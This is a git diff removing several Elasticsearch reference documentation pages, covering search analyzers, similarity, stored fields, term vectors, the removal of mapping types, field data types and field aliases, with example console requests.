- -==== Dot notation - -Inner fields can be referred to in queries, aggregations, etc., using _dot -notation_: - -[source,console] --------------------------------------------------- -GET my-index-000001/_search -{ - "query": { - "match": { - "manager.name": "Alice White" - } - }, - "aggs": { - "Employees": { - "nested": { - "path": "employees" - }, - "aggs": { - "Employee Ages": { - "histogram": { - "field": "employees.age", - "interval": 5 - } - } - } - } - } -} --------------------------------------------------- -// TEST[continued] - -IMPORTANT: The full path to the inner field must be specified. diff --git a/docs/reference/mapping/params/search-analyzer.asciidoc b/docs/reference/mapping/params/search-analyzer.asciidoc deleted file mode 100644 index 9f63b0b5acf..00000000000 --- a/docs/reference/mapping/params/search-analyzer.asciidoc +++ /dev/null @@ -1,79 +0,0 @@ -[[search-analyzer]] -=== `search_analyzer` - -Usually, the same <> should be applied at index time and at -search time, to ensure that the terms in the query are in the same format as -the terms in the inverted index. - -Sometimes, though, it can make sense to use a different analyzer at search -time, such as when using the <> -tokenizer for autocomplete. - -By default, queries will use the `analyzer` defined in the field mapping, but -this can be overridden with the `search_analyzer` setting: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "settings": { - "analysis": { - "filter": { - "autocomplete_filter": { - "type": "edge_ngram", - "min_gram": 1, - "max_gram": 20 - } - }, - "analyzer": { - "autocomplete": { <1> - "type": "custom", - "tokenizer": "standard", - "filter": [ - "lowercase", - "autocomplete_filter" - ] - } - } - } - }, - "mappings": { - "properties": { - "text": { - "type": "text", - "analyzer": "autocomplete", <2> - "search_analyzer": "standard" <2> - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "text": "Quick Brown Fox" <3> -} - -GET my-index-000001/_search -{ - "query": { - "match": { - "text": { - "query": "Quick Br", <4> - "operator": "and" - } - } - } -} - --------------------------------------------------- - -<1> Analysis settings to define the custom `autocomplete` analyzer. -<2> The `text` field uses the `autocomplete` analyzer at index time, but the `standard` analyzer at search time. -<3> This field is indexed as the terms: [ `q`, `qu`, `qui`, `quic`, `quick`, `b`, `br`, `bro`, `brow`, `brown`, `f`, `fo`, `fox` ] -<4> The query searches for both of these terms: [ `quick`, `br` ] - -See {defguide}/_index_time_search_as_you_type.html[Index time search-as-you- -type] for a full explanation of this example. - -TIP: The `search_analyzer` setting can be updated on existing fields -using the <>. diff --git a/docs/reference/mapping/params/similarity.asciidoc b/docs/reference/mapping/params/similarity.asciidoc deleted file mode 100644 index 0ac6455c961..00000000000 --- a/docs/reference/mapping/params/similarity.asciidoc +++ /dev/null @@ -1,55 +0,0 @@ -[[similarity]] -=== `similarity` - -Elasticsearch allows you to configure a scoring algorithm or _similarity_ per -field. The `similarity` setting provides a simple way of choosing a similarity -algorithm other than the default `BM25`, such as `TF/IDF`. - -Similarities are mostly useful for <> fields, but can also apply -to other field types. - -Custom similarities can be configured by tuning the parameters of the built-in -similarities. For more details about this expert options, see the -<>. 
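As a rough sketch of what such tuning can look like, a custom similarity can be declared in the index settings and then referenced from a field mapping (the `my_bm25` name and the `b` value below are illustrative only):

[source,console]
--------------------------------------------------
PUT my-index-000001
{
  "settings": {
    "index": {
      "similarity": {
        "my_bm25": { <1>
          "type": "BM25",
          "b": 0 <2>
        }
      }
    }
  },
  "mappings": {
    "properties": {
      "title": {
        "type": "text",
        "similarity": "my_bm25" <3>
      }
    }
  }
}
--------------------------------------------------

<1> Declares a custom similarity named `my_bm25`, based on the built-in `BM25` similarity.
<2> Tunes one of its parameters, here disabling length normalization.
<3> The `title` field uses the custom similarity instead of the default.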
- -The only similarities which can be used out of the box, without any further -configuration are: - -`BM25`:: -The {wikipedia}/Okapi_BM25[Okapi BM25 algorithm]. The -algorithm used by default in {es} and Lucene. - -`classic`:: -deprecated:[7.0.0] -The https://en.wikipedia.org/wiki/Tf%E2%80%93idf[TF/IDF algorithm], the former -default in {es} and Lucene. - -`boolean`:: - A simple boolean similarity, which is used when full-text ranking is not needed - and the score should only be based on whether the query terms match or not. - Boolean similarity gives terms a score equal to their query boost. - - -The `similarity` can be set on the field level when a field is first created, -as follows: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "default_field": { <1> - "type": "text" - }, - "boolean_sim_field": { - "type": "text", - "similarity": "boolean" <2> - } - } - } -} --------------------------------------------------- - -<1> The `default_field` uses the `BM25` similarity. -<2> The `boolean_sim_field` uses the `boolean` similarity. diff --git a/docs/reference/mapping/params/store.asciidoc b/docs/reference/mapping/params/store.asciidoc deleted file mode 100644 index 78dfad815e7..00000000000 --- a/docs/reference/mapping/params/store.asciidoc +++ /dev/null @@ -1,70 +0,0 @@ -[[mapping-store]] -=== `store` - -By default, field values are <> to make them searchable, -but they are not _stored_. This means that the field can be queried, but the -original field value cannot be retrieved. - -Usually this doesn't matter. The field value is already part of the -<>, which is stored by default. If you -only want to retrieve the value of a single field or of a few fields, instead -of the whole `_source`, then this can be achieved with -<>. - -In certain situations it can make sense to `store` a field. For instance, if -you have a document with a `title`, a `date`, and a very large `content` -field, you may want to retrieve just the `title` and the `date` without having -to extract those fields from a large `_source` field: - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "title": { - "type": "text", - "store": true <1> - }, - "date": { - "type": "date", - "store": true <1> - }, - "content": { - "type": "text" - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "title": "Some short title", - "date": "2015-01-01", - "content": "A very long content field..." -} - -GET my-index-000001/_search -{ - "stored_fields": [ "title", "date" ] <2> -} --------------------------------------------------- - -<1> The `title` and `date` fields are stored. -<2> This request will retrieve the values of the `title` and `date` fields. - -[NOTE] -.Stored fields returned as arrays -====================================== - -For consistency, stored fields are always returned as an _array_ because there -is no way of knowing if the original field value was a single value, multiple -values, or an empty array. - -If you need the original value, you should retrieve it from the `_source` -field instead. - -====================================== - -Another situation where it can make sense to make a field stored is for those -that don't appear in the `_source` field (such as <>). 
diff --git a/docs/reference/mapping/params/term-vector.asciidoc b/docs/reference/mapping/params/term-vector.asciidoc deleted file mode 100644 index b5d83a97ab9..00000000000 --- a/docs/reference/mapping/params/term-vector.asciidoc +++ /dev/null @@ -1,70 +0,0 @@ -[[term-vector]] -=== `term_vector` - -Term vectors contain information about the terms produced by the -<> process, including: - -* a list of terms. -* the position (or order) of each term. -* the start and end character offsets mapping the term to its - origin in the original string. -* payloads (if they are available) — user-defined binary data - associated with each term position. - -These term vectors can be stored so that they can be retrieved for a -particular document. - -The `term_vector` setting accepts: - -[horizontal] -`no`:: No term vectors are stored. (default) -`yes`:: Just the terms in the field are stored. -`with_positions`:: Terms and positions are stored. -`with_offsets`:: Terms and character offsets are stored. -`with_positions_offsets`:: Terms, positions, and character offsets are stored. -`with_positions_payloads`:: Terms, positions, and payloads are stored. -`with_positions_offsets_payloads`:: Terms, positions, offsets and payloads are stored. - -The fast vector highlighter requires `with_positions_offsets`. -<> can retrieve whatever is stored. - -WARNING: Setting `with_positions_offsets` will double the size of a field's -index. - -[source,console] --------------------------------------------------- -PUT my-index-000001 -{ - "mappings": { - "properties": { - "text": { - "type": "text", - "term_vector": "with_positions_offsets" - } - } - } -} - -PUT my-index-000001/_doc/1 -{ - "text": "Quick brown fox" -} - -GET my-index-000001/_search -{ - "query": { - "match": { - "text": "brown fox" - } - }, - "highlight": { - "fields": { - "text": {} <1> - } - } -} --------------------------------------------------- - -<1> The fast vector highlighter will be used by default for the `text` field - because term vectors are enabled. - diff --git a/docs/reference/mapping/removal_of_types.asciidoc b/docs/reference/mapping/removal_of_types.asciidoc deleted file mode 100644 index f0550d3f93a..00000000000 --- a/docs/reference/mapping/removal_of_types.asciidoc +++ /dev/null @@ -1,732 +0,0 @@ -[[removal-of-types]] -== Removal of mapping types - -IMPORTANT: Indices created in Elasticsearch 7.0.0 or later no longer accept a -`_default_` mapping. Indices created in 6.x will continue to function as before -in Elasticsearch 6.x. Types are deprecated in APIs in 7.0, with breaking changes -to the index creation, put mapping, get mapping, put template, get template and -get field mappings APIs. - -[discrete] -=== What are mapping types? - -Since the first release of Elasticsearch, each document has been stored in a -single index and assigned a single mapping type. A mapping type was used to -represent the type of document or entity being indexed, for instance a -`twitter` index might have a `user` type and a `tweet` type. - -Each mapping type could have its own fields, so the `user` type might have a -`full_name` field, a `user_name` field, and an `email` field, while the -`tweet` type could have a `content` field, a `tweeted_at` field and, like the -`user` type, a `user_name` field. 
- -Each document had a `_type` metadata field containing the type name, and searches -could be limited to one or more types by specifying the type name(s) in the -URL: - -[source,js] ----- -GET twitter/user,tweet/_search -{ - "query": { - "match": { - "user_name": "kimchy" - } - } -} ----- -// NOTCONSOLE - -The `_type` field was combined with the document's `_id` to generate a `_uid` -field, so documents of different types with the same `_id` could exist in a -single index. - -Mapping types were also used to establish a -<> -between documents, so documents of type `question` could be parents to -documents of type `answer`. - -[discrete] -=== Why are mapping types being removed? - -Initially, we spoke about an ``index'' being similar to a ``database'' in an -SQL database, and a ``type'' being equivalent to a -``table''. - -This was a bad analogy that led to incorrect assumptions. In an SQL database, -tables are independent of each other. The columns in one table have no -bearing on columns with the same name in another table. This is not the case -for fields in a mapping type. - -In an Elasticsearch index, fields that have the same name in different mapping -types are backed by the same Lucene field internally. In other words, using -the example above, the `user_name` field in the `user` type is stored in -exactly the same field as the `user_name` field in the `tweet` type, and both -`user_name` fields must have the same mapping (definition) in both types. - -This can lead to frustration when, for example, you want `deleted` to be a -`date` field in one type and a `boolean` field in another type in the same -index. - -On top of that, storing different entities that have few or no fields in -common in the same index leads to sparse data and interferes with Lucene's -ability to compress documents efficiently. - -For these reasons, we have decided to remove the concept of mapping types from -Elasticsearch. - -[discrete] -=== Alternatives to mapping types - -[discrete] -==== Index per document type - -The first alternative is to have an index per document type. Instead of -storing tweets and users in a single `twitter` index, you could store tweets -in the `tweets` index and users in the `user` index. Indices are completely -independent of each other and so there will be no conflict of field types -between indices. - -This approach has two benefits: - -* Data is more likely to be dense and so benefit from compression techniques - used in Lucene. - -* The term statistics used for scoring in full text search are more likely to - be accurate because all documents in the same index represent a single - entity. - -Each index can be sized appropriately for the number of documents it will -contain: you can use a smaller number of primary shards for `users` and a -larger number of primary shards for `tweets`. - -[discrete] -==== Custom type field - -Of course, there is a limit to how many primary shards can exist in a cluster -so you may not want to waste an entire shard for a collection of only a few -thousand documents. In this case, you can implement your own custom `type` -field which will work in a similar way to the old `_type`. - -Let's take the `user`/`tweet` example above. 
Originally, the workflow would -have looked something like this: - -[source,js] ----- -PUT twitter -{ - "mappings": { - "user": { - "properties": { - "name": { "type": "text" }, - "user_name": { "type": "keyword" }, - "email": { "type": "keyword" } - } - }, - "tweet": { - "properties": { - "content": { "type": "text" }, - "user_name": { "type": "keyword" }, - "tweeted_at": { "type": "date" } - } - } - } -} - -PUT twitter/user/kimchy -{ - "name": "Shay Banon", - "user_name": "kimchy", - "email": "shay@kimchy.com" -} - -PUT twitter/tweet/1 -{ - "user_name": "kimchy", - "tweeted_at": "2017-10-24T09:00:00Z", - "content": "Types are going away" -} - -GET twitter/tweet/_search -{ - "query": { - "match": { - "user_name": "kimchy" - } - } -} ----- -// NOTCONSOLE - -You can achieve the same thing by adding a custom `type` field as follows: - -[source,js] ----- -PUT twitter -{ - "mappings": { - "_doc": { - "properties": { - "type": { "type": "keyword" }, <1> - "name": { "type": "text" }, - "user_name": { "type": "keyword" }, - "email": { "type": "keyword" }, - "content": { "type": "text" }, - "tweeted_at": { "type": "date" } - } - } - } -} - -PUT twitter/_doc/user-kimchy -{ - "type": "user", <1> - "name": "Shay Banon", - "user_name": "kimchy", - "email": "shay@kimchy.com" -} - -PUT twitter/_doc/tweet-1 -{ - "type": "tweet", <1> - "user_name": "kimchy", - "tweeted_at": "2017-10-24T09:00:00Z", - "content": "Types are going away" -} - -GET twitter/_search -{ - "query": { - "bool": { - "must": { - "match": { - "user_name": "kimchy" - } - }, - "filter": { - "match": { - "type": "tweet" <1> - } - } - } - } -} ----- -// NOTCONSOLE -<1> The explicit `type` field takes the place of the implicit `_type` field. - -[discrete] -[[parent-child-mapping-types]] -==== Parent/Child without mapping types - -Previously, a parent-child relationship was represented by making one mapping -type the parent, and one or more other mapping types the children. Without -types, we can no longer use this syntax. The parent-child feature will -continue to function as before, except that the way of expressing the -relationship between documents has been changed to use the new -<>. - - -[discrete] -=== Schedule for removal of mapping types - -This is a big change for our users, so we have tried to make it as painless as -possible. The change will roll out as follows: - -Elasticsearch 5.6.0:: - -* Setting `index.mapping.single_type: true` on an index will enable the - single-type-per-index behaviour which will be enforced in 6.0. - -* The <> replacement for parent-child is available - on indices created in 5.6. - -Elasticsearch 6.x:: - -* Indices created in 5.x will continue to function in 6.x as they did in 5.x. - -* Indices created in 6.x only allow a single-type per index. Any name - can be used for the type, but there can be only one. The preferred type name - is `_doc`, so that index APIs have the same path as they will have in 7.0: - `PUT {index}/_doc/{id}` and `POST {index}/_doc` - -* The `_type` name can no longer be combined with the `_id` to form the `_uid` - field. The `_uid` field has become an alias for the `_id` field. - -* New indices no longer support the old-style of parent/child and should - use the <> instead. - -* The `_default_` mapping type is deprecated. - -* In 6.8, the index creation, index template, and mapping APIs support a query - string parameter (`include_type_name`) which indicates whether requests and - responses should include a type name. 
It defaults to `true`, and should be set - to an explicit value to prepare to upgrade to 7.0. Not setting `include_type_name` - will result in a deprecation warning. Indices which don't have an explicit type will - use the dummy type name `_doc`. - -Elasticsearch 7.x:: - -* Specifying types in requests is deprecated. For instance, indexing a - document no longer requires a document `type`. The new index APIs - are `PUT {index}/_doc/{id}` in case of explicit ids and `POST {index}/_doc` - for auto-generated ids. Note that in 7.0, `_doc` is a permanent part of the - path, and represents the endpoint name rather than the document type. - -* The `include_type_name` parameter in the index creation, index template, - and mapping APIs will default to `false`. Setting the parameter at all will - result in a deprecation warning. - -* The `_default_` mapping type is removed. - -Elasticsearch 8.x:: - -* Specifying types in requests is no longer supported. - -* The `include_type_name` parameter is removed. - -[discrete] -=== Migrating multi-type indices to single-type - -The <> can be used to convert multi-type indices to -single-type indices. The following examples can be used in Elasticsearch 5.6 -or Elasticsearch 6.x. In 6.x, there is no need to specify -`index.mapping.single_type` as that is the default. - -[discrete] -==== Index per document type - -This first example splits our `twitter` index into a `tweets` index and a -`users` index: - -[source,js] ----- -PUT users -{ - "settings": { - "index.mapping.single_type": true - }, - "mappings": { - "_doc": { - "properties": { - "name": { - "type": "text" - }, - "user_name": { - "type": "keyword" - }, - "email": { - "type": "keyword" - } - } - } - } -} - -PUT tweets -{ - "settings": { - "index.mapping.single_type": true - }, - "mappings": { - "_doc": { - "properties": { - "content": { - "type": "text" - }, - "user_name": { - "type": "keyword" - }, - "tweeted_at": { - "type": "date" - } - } - } - } -} - -POST _reindex -{ - "source": { - "index": "twitter", - "type": "user" - }, - "dest": { - "index": "users", - "type": "_doc" - } -} - -POST _reindex -{ - "source": { - "index": "twitter", - "type": "tweet" - }, - "dest": { - "index": "tweets", - "type": "_doc" - } -} ----- -// NOTCONSOLE - -[discrete] -==== Custom type field - -This next example adds a custom `type` field and sets it to the value of the -original `_type`. It also adds the type to the `_id` in case there are any -documents of different types which have conflicting IDs: - -[source,js] ----- -PUT new_twitter -{ - "mappings": { - "_doc": { - "properties": { - "type": { - "type": "keyword" - }, - "name": { - "type": "text" - }, - "user_name": { - "type": "keyword" - }, - "email": { - "type": "keyword" - }, - "content": { - "type": "text" - }, - "tweeted_at": { - "type": "date" - } - } - } - } -} - - -POST _reindex -{ - "source": { - "index": "twitter" - }, - "dest": { - "index": "new_twitter" - }, - "script": { - "source": """ - ctx._source.type = ctx._type; - ctx._id = ctx._type + '-' + ctx._id; - ctx._type = '_doc'; - """ - } -} ----- -// NOTCONSOLE - -[discrete] -=== Typeless APIs in 7.0 - -In Elasticsearch 7.0, each API will support typeless requests, -and specifying a type will produce a deprecation warning. - -NOTE: Typeless APIs work even if the target index contains a custom type. -For example, if an index has the custom type name `my_type`, we can add -documents to it using typeless `index` calls, and load documents with typeless -`get` calls. 
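As a rough sketch (using the same `my_type` name for illustration):

[source,js]
----
PUT my-index-000001?include_type_name=true
{
  "mappings": {
    "my_type": { <1>
      "properties": {
        "foo": { "type": "keyword" }
      }
    }
  }
}

PUT my-index-000001/_doc/1 <2>
{
  "foo": "bar"
}

GET my-index-000001/_doc/1 <3>
----
// NOTCONSOLE

<1> The index is created with the custom type name `my_type`.
<2> A typeless `index` call still works against this index.
<3> So does a typeless `get` call.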
- -[discrete] -==== Index APIs - -Index creation, index template, and mapping APIs support a new `include_type_name` -URL parameter that specifies whether mapping definitions in requests and responses -should contain the type name. The parameter defaults to `true` in version 6.8 to -match the pre-7.0 behavior of using type names in mappings. It defaults to `false` -in version 7.0 and will be removed in version 8.0. - -It should be set explicitly in 6.8 to prepare to upgrade to 7.0. To avoid deprecation -warnings in 6.8, the parameter can be set to either `true` or `false`. In 7.0, setting -`include_type_name` at all will result in a deprecation warning. - -See some examples of interactions with Elasticsearch with this option set to `false`: - -[source,console] --------------------------------------------------- -PUT /my-index-000001?include_type_name=false -{ - "mappings": { - "properties": { <1> - "foo": { - "type": "keyword" - } - } - } -} --------------------------------------------------- - -<1> Mappings are included directly under the `mappings` key, without a type name. - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_mappings?include_type_name=false -{ - "properties": { <1> - "bar": { - "type": "text" - } - } -} --------------------------------------------------- -// TEST[continued] - -<1> Mappings are included directly under the `mappings` key, without a type name. - -[source,console] --------------------------------------------------- -GET /my-index-000001/_mappings?include_type_name=false --------------------------------------------------- -// TEST[continued] - -The above call returns - -[source,console-result] --------------------------------------------------- -{ - "my-index-000001": { - "mappings": { - "properties": { <1> - "foo": { - "type": "keyword" - }, - "bar": { - "type": "text" - } - } - } - } -} --------------------------------------------------- - -<1> Mappings are included directly under the `mappings` key, without a type name. - -[discrete] -==== Document APIs - -In 7.0, index APIs must be called with the `{index}/_doc` path for automatic -generation of the `_id` and `{index}/_doc/{id}` with explicit ids. - -[source,console] --------------------------------------------------- -PUT /my-index-000001/_doc/1 -{ - "foo": "baz" -} --------------------------------------------------- - -[source,console-result] --------------------------------------------------- -{ - "_index": "my-index-000001", - "_id": "1", - "_type": "_doc", - "_version": 1, - "result": "created", - "_shards": { - "total": 2, - "successful": 1, - "failed": 0 - }, - "_seq_no": 0, - "_primary_term": 1 -} --------------------------------------------------- - -Similarly, the `get` and `delete` APIs use the path `{index}/_doc/{id}`: - -[source,console] --------------------------------------------------- -GET /my-index-000001/_doc/1 --------------------------------------------------- -// TEST[continued] - -NOTE: In 7.0, `_doc` represents the endpoint name instead of the document type. -The `_doc` component is a permanent part of the path for the document `index`, -`get`, and `delete` APIs going forward, and will not be removed in 8.0. 
- -For API paths that contain both a type and endpoint name like `_update`, -in 7.0 the endpoint will immediately follow the index name: - -[source,console] --------------------------------------------------- -POST /my-index-000001/_update/1 -{ - "doc" : { - "foo" : "qux" - } -} - -GET /my-index-000001/_source/1 --------------------------------------------------- -// TEST[continued] - -Types should also no longer appear in the body of requests. The following -example of bulk indexing omits the type both in the URL, and in the individual -bulk commands: - -[source,console] --------------------------------------------------- -POST _bulk -{ "index" : { "_index" : "my-index-000001", "_id" : "3" } } -{ "foo" : "baz" } -{ "index" : { "_index" : "my-index-000001", "_id" : "4" } } -{ "foo" : "qux" } --------------------------------------------------- - -[discrete] -==== Search APIs - -When calling a search API such `_search`, `_msearch`, or `_explain`, types -should not be included in the URL. Additionally, the `_type` field should not -be used in queries, aggregations, or scripts. - -[discrete] -==== Types in responses - -The document and search APIs will continue to return a `_type` key in -responses, to avoid breaks to response parsing. However, the key is -considered deprecated and should no longer be referenced. Types will -be completely removed from responses in 8.0. - -Note that when a deprecated typed API is used, the index's mapping type will be -returned as normal, but that typeless APIs will return the dummy type `_doc` -in the response. For example, the following typeless `get` call will always -return `_doc` as the type, even if the mapping has a custom type name like -`my_type`: - -[source,console] --------------------------------------------------- -PUT /my-index-000001/my_type/1 -{ - "foo": "baz" -} - -GET /my-index-000001/_doc/1 --------------------------------------------------- - -[source,console-result] --------------------------------------------------- -{ - "_index" : "my-index-000001", - "_type" : "_doc", - "_id" : "1", - "_version" : 1, - "_seq_no" : 0, - "_primary_term" : 1, - "found": true, - "_source" : { - "foo" : "baz" - } -} --------------------------------------------------- - -[discrete] -==== Index templates - -It is recommended to make index templates typeless by re-adding them with -`include_type_name` set to `false`. Under the hood, typeless templates will use -the dummy type `_doc` when creating indices. - -In case typeless templates are used with typed index creation calls or typed -templates are used with typeless index creation calls, the template will still -be applied but the index creation call decides whether there should be a type -or not. For instance in the below example, `index-1-01` will have a type in -spite of the fact that it matches a template that is typeless, and `index-2-01` -will be typeless in spite of the fact that it matches a template that defines -a type. Both `index-1-01` and `index-2-01` will inherit the `foo` field from -the template that they match. 
- -[source,console] --------------------------------------------------- -PUT _template/template1 -{ - "index_patterns":[ "index-1-*" ], - "mappings": { - "properties": { - "foo": { - "type": "keyword" - } - } - } -} - -PUT _template/template2?include_type_name=true -{ - "index_patterns":[ "index-2-*" ], - "mappings": { - "type": { - "properties": { - "foo": { - "type": "keyword" - } - } - } - } -} - -PUT index-1-01?include_type_name=true -{ - "mappings": { - "type": { - "properties": { - "bar": { - "type": "long" - } - } - } - } -} - -PUT index-2-01 -{ - "mappings": { - "properties": { - "bar": { - "type": "long" - } - } - } -} --------------------------------------------------- - -////////////////////////// - -[source,console] --------------------------------------------------- -DELETE /_template/template1 -DELETE /_template/template2 --------------------------------------------------- -// TEST[continued] - -////////////////////////// - -In case of implicit index creation, because of documents that get indexed in -an index that doesn't exist yet, the template is always honored. This is -usually not a problem due to the fact that typeless index calls work on typed -indices. - -[discrete] -==== Mixed-version clusters - -In a cluster composed of both 6.8 and 7.0 nodes, the parameter -`include_type_name` should be specified in index APIs like index -creation. This is because the parameter has a different default between -6.8 and 7.0, so the same mapping definition will not be valid for both -node versions. - -Typeless document APIs such as `bulk` and `update` are only available as of -7.0, and will not work with 6.8 nodes. This also holds true for the typeless -versions of queries that perform document lookups, such as `terms`. diff --git a/docs/reference/mapping/types.asciidoc b/docs/reference/mapping/types.asciidoc deleted file mode 100644 index 4cce14ea7f5..00000000000 --- a/docs/reference/mapping/types.asciidoc +++ /dev/null @@ -1,186 +0,0 @@ -[[mapping-types]] -== Field data types - -Each field has a _field data type_, or _field type_. This type indicates the -kind of data the field contains, such as strings or boolean values, and its -intended use. For example, you can index strings to both `text` and `keyword` -fields. However, `text` field values are <> for full-text -search while `keyword` strings are left as-is for filtering and sorting. - -Field types are grouped by _family_. Types in the same family support the same -search functionality but may have different space usage or performance -characteristics. - -Currently, the only type family is `keyword`, which consists of the `keyword`, -`constant_keyword`, and `wildcard` field types. Other type families have only a -single field type. For example, the `boolean` type family consists of one field -type: `boolean`. - - -[discrete] -[[_core_datatypes]] -==== Common types - -<>:: Binary value encoded as a Base64 string. -<>:: `true` and `false` values. -<>:: The keyword family, including `keyword`, `constant_keyword`, - and `wildcard`. -<>:: Numeric types, such as `long` and `double`, used to - express amounts. -Dates:: Date types, including <> and - <>. -<>:: Defines an alias for an existing field. - - -[discrete] -[[object-types]] -==== Objects and relational types - -<>:: A JSON object. -<>:: An entire JSON object as a single field value. -<>:: A JSON object that preserves the relationship - between its subfields. -<>:: Defines a parent/child relationship for documents - in the same index. 
- - -[discrete] -[[structured-data-types]] -==== Structured data types - -<>:: Range types, such as `long_range`, `double_range`, - `date_range`, and `ip_range`. -<>:: IPv4 and IPv6 addresses. -<>:: Software versions. Supports https://semver.org/[Semantic Versioning] -precedence rules. -{plugins}/mapper-murmur3.html[`murmur3`]:: Compute and stores hashes of -values. - - -[discrete] -[[aggregated-data-types]] -==== Aggregate data types - -<>:: Pre-aggregated numerical values. - - -[discrete] -[[text-search-types]] -==== Text search types - -<>:: Analyzed, unstructured text. -{plugins}/mapper-annotated-text.html[`annotated-text`]:: Text containing special -markup. Used for identifying named entities. -<>:: Used for auto-complete suggestions. -<>:: `text`-like type for -as-you-type completion. -<>:: A count of tokens in a text. - - -[discrete] -[[document-ranking-types]] -==== Document ranking types - -<>:: Records dense vectors of float values. -<>:: Records sparse vectors of float values. -<>:: Records a numeric feature to boost hits at - query time. -<>:: Records numeric features to boost hits at - query time. - - -[discrete] -[[spatial_datatypes]] -==== Spatial data types - -<>:: Latitude and longitude points. -<>:: Complex shapes, such as polygons. -<>:: Arbitrary cartesian points. -<>:: Arbitrary cartesian geometries. - - -[discrete] -[[other-types]] -==== Other types - -<>:: Indexes queries written in <>. - - -[discrete] -[[types-array-handling]] -=== Arrays -In {es}, arrays do not require a dedicated field data type. Any field can contain -zero or more values by default, however, all values in the array must be of the -same field type. See <>. - -[discrete] -=== Multi-fields - -It is often useful to index the same field in different ways for different -purposes. For instance, a `string` field could be mapped as -a `text` field for full-text search, and as a `keyword` field for -sorting or aggregations. Alternatively, you could index a text field with -the <>, the -<> analyzer, and the -<>. - -This is the purpose of _multi-fields_. Most field types support multi-fields -via the <> parameter. 
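A minimal sketch of such a mapping might look like this (the `city` field and its `raw` sub-field are purely illustrative):

[source,console]
--------------------------------------------------
PUT my-index-000001
{
  "mappings": {
    "properties": {
      "city": {
        "type": "text", <1>
        "fields": {
          "raw": {
            "type": "keyword" <2>
          }
        }
      }
    }
  }
}
--------------------------------------------------

<1> The `city` field is analyzed for full-text search.
<2> The `city.raw` sub-field keeps the original string for sorting and aggregations.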
- -include::types/alias.asciidoc[] - -include::types/array.asciidoc[] - -include::types/binary.asciidoc[] - -include::types/boolean.asciidoc[] - -include::types/date.asciidoc[] - -include::types/date_nanos.asciidoc[] - -include::types/dense-vector.asciidoc[] - -include::types/flattened.asciidoc[] - -include::types/geo-point.asciidoc[] - -include::types/geo-shape.asciidoc[] - -include::types/histogram.asciidoc[] - -include::types/ip.asciidoc[] - -include::types/parent-join.asciidoc[] - -include::types/keyword.asciidoc[] - -include::types/nested.asciidoc[] - -include::types/numeric.asciidoc[] - -include::types/object.asciidoc[] - -include::types/percolator.asciidoc[] - -include::types/point.asciidoc[] - -include::types/range.asciidoc[] - -include::types/rank-feature.asciidoc[] - -include::types/rank-features.asciidoc[] - -include::types/search-as-you-type.asciidoc[] - -include::types/shape.asciidoc[] - -include::types/sparse-vector.asciidoc[] - -include::types/text.asciidoc[] - -include::types/token-count.asciidoc[] - -include::types/unsigned_long.asciidoc[] - -include::types/version.asciidoc[] diff --git a/docs/reference/mapping/types/alias.asciidoc b/docs/reference/mapping/types/alias.asciidoc deleted file mode 100644 index 78d9b749721..00000000000 --- a/docs/reference/mapping/types/alias.asciidoc +++ /dev/null @@ -1,103 +0,0 @@ -[[alias]] -=== Alias field type -++++ -Alias -++++ - -An `alias` mapping defines an alternate name for a field in the index. -The alias can be used in place of the target field in <> requests, -and selected other APIs like <>. - -[source,console] --------------------------------- -PUT trips -{ - "mappings": { - "properties": { - "distance": { - "type": "long" - }, - "route_length_miles": { - "type": "alias", - "path": "distance" <1> - }, - "transit_mode": { - "type": "keyword" - } - } - } -} - -GET _search -{ - "query": { - "range" : { - "route_length_miles" : { - "gte" : 39 - } - } - } -} --------------------------------- - -<1> The path to the target field. Note that this must be the full path, including any parent -objects (e.g. `object1.object2.field`). - -Almost all components of the search request accept field aliases. In particular, aliases can be -used in queries, aggregations, and sort fields, as well as when requesting `docvalue_fields`, -`stored_fields`, suggestions, and highlights. Scripts also support aliases when accessing -field values. Please see the section on <> for exceptions. - -In some parts of the search request and when requesting field capabilities, field wildcard patterns can be -provided. In these cases, the wildcard pattern will match field aliases in addition to concrete fields: - -[source,console] --------------------------------- -GET trips/_field_caps?fields=route_*,transit_mode --------------------------------- -// TEST[continued] - -[[alias-targets]] -==== Alias targets - -There are a few restrictions on the target of an alias: - - * The target must be a concrete field, and not an object or another field alias. - * The target field must exist at the time the alias is created. - * If nested objects are defined, a field alias must have the same nested scope as its target. - -Additionally, a field alias can only have one target. This means that it is not possible to use a -field alias to query over multiple target fields in a single clause. - -An alias can be changed to refer to a new target through a mappings update. 
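A sketch of such an update might look like the following, reusing the `trips` index above (the `distance_meters` field is hypothetical and is added only so the alias has a new concrete target):

[source,console]
--------------------------------
PUT trips/_mapping
{
  "properties": {
    "distance_meters": { "type": "long" } <1>
  }
}

PUT trips/_mapping
{
  "properties": {
    "route_length_miles": {
      "type": "alias",
      "path": "distance_meters" <2>
    }
  }
}
--------------------------------
// TEST[continued]

<1> A new concrete field that will serve as the alias target.
<2> The existing alias is updated to point at the new target.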
A known limitation is that -if any stored percolator queries contain the field alias, they will still refer to its original target. -More information can be found in the <>. - -[[unsupported-apis]] -==== Unsupported APIs - -Writes to field aliases are not supported: attempting to use an alias in an index or update request -will result in a failure. Likewise, aliases cannot be used as the target of `copy_to` or in multi-fields. - -Because alias names are not present in the document source, aliases cannot be used when performing -source filtering. For example, the following request will return an empty result for `_source`: - -[source,console] --------------------------------- -GET /_search -{ - "query" : { - "match_all": {} - }, - "_source": "route_length_miles" -} --------------------------------- -// TEST[continued] - -Currently only the search and field capabilities APIs will accept and resolve field aliases. -Other APIs that accept field names, such as <>, cannot be used -with field aliases. - -Finally, some queries, such as `terms`, `geo_shape`, and `more_like_this`, allow for fetching query -information from an indexed document. Because field aliases aren't supported when fetching documents, -the part of the query that specifies the lookup path cannot refer to a field by its alias. \ No newline at end of file diff --git a/docs/reference/mapping/types/array.asciidoc b/docs/reference/mapping/types/array.asciidoc deleted file mode 100644 index 38eabb14c19..00000000000 --- a/docs/reference/mapping/types/array.asciidoc +++ /dev/null @@ -1,100 +0,0 @@ -[[array]] -=== Arrays - -In Elasticsearch, there is no dedicated `array` data type. Any field can contain -zero or more values by default, however, all values in the array must be of the -same data type. For instance: - -* an array of strings: [ `"one"`, `"two"` ] -* an array of integers: [ `1`, `2` ] -* an array of arrays: [ `1`, [ `2`, `3` ]] which is the equivalent of [ `1`, `2`, `3` 